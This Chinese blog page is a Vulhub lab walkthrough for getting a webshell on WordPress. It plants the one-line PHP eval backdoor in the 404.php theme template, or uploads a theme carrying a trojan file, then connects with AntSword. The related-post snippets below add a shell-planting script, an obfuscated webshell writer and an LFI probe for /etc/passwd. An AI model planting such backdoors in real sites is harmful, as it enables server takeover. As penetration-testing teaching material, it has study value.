常⻅CMS漏洞 Vulhub-WordPress获取shell

最新推荐文章于 2025-03-20 19:34:36 发布

原创最新推荐文章于 2025-03-20 19:34:36 发布 · 479 阅读

6 ·

CC 4.0 BY-SA版权

文章标签：

#网络攻击模型

WordPress是⼀个以PHP和MySQL为平台的⾃由开源的博客软件和内容管理系统

姿势一后台修改模板拿WebShell

1.进⼊Vulhub靶场并执⾏以下命令开启靶场；在浏览器中访问并安装好

cd /vulhub/wordpress/pwnscriptum

docker-compose up -d

选取中文

2.登陆WP后点击【外观】 --》【编辑】 --》 404.php 在其404模板中插⼊⼀句话⽊⻢代码

思路是修改其WP的模板写⼊⼀句话⽊⻢后⻔并访问其⽂件即可GetShell

<?php eval($_POST[cmd]);?>

3.访问以下连接即可获取WebShell

/wp-content/themes/twentyfifteen/404.php

蚁剑连接

姿势二上传主题拿WebShell

1.上传木马文件

接着上⼀个环境使用

从网上下载主题

将带有木马文件加入到主题中并将主题压缩为ZIP文件

2.安装成功后访问主题下的⽹站后⻔⽂件

/wp-content/themes/smartenterprise-free/999.php

3.蚁剑连接

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ksk852

关注关注

14
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

wordpress获取登录权限后获取shell的方法

墨痕诉清风的博客

09-03

2822

当获取wordpress登录凭证后，获取shell的方法。运行后目录下会自动生成一个zip文件并启动了msf监听。插件要按wordpress的格式写才会被上传成功。这里做一个php.zip的文件进行上传。利用现有的代码文件进行修改。最终得到的访问路径拼装得到。添加自己的shell代码。如图所示点击插件进行上传。这里要主要右上角的名称。访问即可获取shell。再压缩一次上传又失败了。设置 PASSWORD。设置 USERNAME。

BUGKU WP-getshell

m0_55631425的博客

06-20

755

蚁剑连接 linux主机，putenv=on，用LD_PRELOAD方法绕过注意windows无法使用该插件，建议上虚拟机附赠蚁剑插件市场打不开的解决办法： http://mp.weixin.qq.com/s?__biz=MzI0MDI5MTQ3OQ==&mid=2247484036&idx=1&sn=9ee9156e63b8f17c147fc0c05be69027&chksm=e91c597cde6bd06a7abdec4ad9cf3d275530af3bdc069..

参与评论您还未登录，请先登录后发表或查看评论

wordpress-getshell

06-05

Wordpress GetShell - 公共版使用有效的用户名和密码组合，下面的脚本演示了如何自动植入 PHP shell 示例用法 %> perl wp-getshell.pl http://ubuntu64/wordpress admin admin [+] Logged in, replacing cookies [+] Now looking for editor [+] Editor found, old content length 48 [+] Building forms --> _wpnonce with value 09f8f3fb95 --> file with value 404.php --> _wp_http_referer with value /wordpress/wp-admin/theme-editor.php?file=4

wordpress拿WebShell

weixin_34301307的博客

02-21

488

v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} wordpress拿WebShell Simeon 安天365 WordP...

WordPress Get Shell

weixin_34221073的博客

12-11

213

WordPress3.0后台404页面可以自定义 “外观”-“编辑”-“404模板 <script language="php">fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(11...

AdmX_new（Wordpress getshell & 二次提权）

weixin_46591320的博客

11-26

1641

Wordpress getshell

WORDPRESS后台拿SHELL的方法

cnbird's blog

12-17

5256

WORDPRESS后台拿SHELL的方法

简单了解cms，复现vulhub中的wordpress漏洞

weixin_64655821的博客

09-12

1185

简单了解cms，复现vulhub中的wordpress漏洞

常见CMS漏洞（WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin）

2301_76631050的博客

08-04

2312

利⽤mysql⽇志⽂件写shell，这个⽇志可以在mysql⾥改变它的存放位置，登录phpmyadmin可以修改这个存放位置，并且可以修改它的后缀名。PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。路径: E:\phpstudy_pro\Extensions\MySQL5.7.26\data\。猜测web路径: E:\phpstudy_pro\WWW。不要用\,如里要用\\(转义)

vulnhub靶场 DC-2靶机渗透详细过程

黑战士的博客

02-21

1100

*4.rbash提权**

红队专题-漏洞挖掘-代码审计

aming小老弟

03-11

1238

其中 Web A 为存在 CSRF 漏洞的网站，Web B 为攻击者构建的恶意网站，User C 为 Web A 网站的合法用户。用户 C 打开浏览器，访问受信任网站 A，输入用户名和密码请求登录网站A在用户信息通过验证后，网站 A 产生 Cookie 信息并返回给浏览器，此时用户登录网站 A 成功，可以正常发送请求到网站A用户未退出网站 A 之前，在同一浏览器中，打开一个 TAB 页访问网站 B网站 B 接收到用户请求后，返回一些攻击性代码，并发出一个请求要求访问第三方站点 A。

Wordpress 4.6 任意命令执行漏洞

玄道的网安博客

06-12

4962

1、简介 WordPress 是一种使用 PHP 语言开发的博客平台，用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统（CMS）来使用。 2、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 3、环境搭建我们这里使用vulhub和docker搭建环境 cd vulhub/wordpress/pwnscriptum docker-compose build docke

[视频]K8飞刀 WordPress XSS添加管理员 & GetShell 教程-附件资源

03-05

[视频]K8飞刀 WordPress XSS添加管理员 & GetShell 教程-附件资源

【菜鸟腾飞】简单的Getshell和windows提权_漏洞研究

11-01

【菜鸟腾飞】简单的Getshell和windows提权_漏洞研究【菜鸟腾飞】简单的Getshell和windows提权_漏洞研究

WordPress 进入后台获取shell的几种姿势（wordpress getshell）

vortex5的博客

12-29

1376

👨‍🎓 博主介绍：大家好，我是 vortex5 ，很高兴认识大家 ➤。

wordpress漏洞getshell

qq_59671410的博客

03-20

199

1.在docker启动靶场，使用9595端口，访问。4.我们在网络搜索可得，该PHP文件的目录位置。5.我们拼接url，访问该页面，访问成功。3.我们输入一句话木马,并保存。2.发现他的模板文件可以修改。6.用蚁剑尝试连接，成功。

wordpress 3.0-3.9.2 XSS Getshell Payload(可Getshell当前模板也可以是全部插件模板)

收集盒 Book box

12-14

1231

0x_Jin 如果实战用记得把 console.lnfo 那一行该为发送喔。。。密码：fuckxssQ 这个getshell js 有getshell当前模板跟getshell全部模板的功能默认是getshell当前模板 StartGetshell = 0 如果要getshell全部插件模板把 StartGetshell的值改为1 即可 /* 0x_Jin Word

wordpress 5.1 后台拿shell

weixin_30617561的博客

03-19

574

Vulnhub 靶机 Quaoar write up wordpresscms 漏洞利用上传插件 getshell wp-config 获取到数据库账号密码用于ssh登录提权

YouthBelief的博客

12-29

2695

0x00 环境搭建下载地址 https://download.vulnhub.com/hackfest2016/Quaoar.ova 运行环境 Virtual Box 仅主机网络 kali 搭建同网卡目标 root权限 flag文件 0x01 信息收集靶机ip探测 nmap -sP 192.168.56.0/24 192.168.56.109 端口服务探测识别 nmap -sC -sV -A -p- 192.168.56.109 -o port.txt 22/tcp

vulhub-cmsms

最新发布

03-28

### 关于 Vulhub 中 CMSMS 的设置与使用 #### 环境搭建在 Vulhub 平台中，CMSMS 是一种常见的 Web 应用程序漏洞实验目标。为了模拟真实环境中的安全测试场景，可以通过 Docker 容器快速部署 CMSMS 漏洞环境。具体操作如下： 1. **安装 Docker 和 Docker Compose** 需要先确保本地已正确安装并运行 Docker 及其扩展工具 Docker Compose。 2. **克隆 Vulhub 仓库** 使用以下命令下载官方 Vulhub 项目源码： ```bash git clone https://github.com/vulhub/vulhub.git ``` 3. **进入对应目录** 进入 CMSMS 相关漏洞的特定路径，例如针对 CVE-2019-9053 或其他版本漏洞的文件夹： ```bash cd vulhub/cmsms/CVE-2019-9053 ``` 4. **启动容器服务** 执行以下命令以初始化并启动所需的虚拟化环境： ```bash docker-compose up -d ``` 此过程会自动拉取必要的镜像资源，并完成基础配置工作[^1]。 #### 基本功能验证一旦成功构建好上述实例之后，访问指定端口即可加载默认页面来确认是否正常运作。通常情况下，默认地址为 `http://localhost` 加上相应映射后的 HTTP(S)端口号（比如80或者443）。与此同时还可以利用 SQL 查询语句进一步探索后台数据库结构及其存储信息[^2]: ```sql show databases; use cmsms_db; show tables; select * from cms_users; ``` 这些指令有助于了解系统的整体布局以及潜在可被利用的数据点位置关系等情况。 #### 利用漏洞实现远程代码执行 (RCE) 当面对较低版本号如小于等于 v2.2.9.0 的 CMS Made Simple 软件时，存在严重的安全隐患——即未经身份认证便允许恶意行为者借助组合型缺陷(CVE编号分别为2019年发布的9053号条目加上稍晚些时候发现出来的另一个编号则为2021年的那个)，从而达成完全控制受害主机的目的[^3]。需要注意的是，在实际渗透过程中应当严格遵循法律法规框架内的许可范围行事，切勿非法入侵他人网络资产！ --- ### 提供一段 Python 脚本来辅助自动化部分流程作为示例参考下面给出了一段简单的 python 脚本用于演示如何通过 requests 库发送请求至可能存在该类问题的目标站点: ```python import requests url = 'http://target-site/index.php?page=' payload = '../../../../etc/passwd' response = requests.get(url + payload) if response.status_code == 200 and "root:" in response.text: print("[+] Vulnerable to LFI!") else: print("[-] Not vulnerable.") ``` 此脚本仅作学习用途展示原理，请谨慎对待线上生产环境中任何尝试性的动作。 ---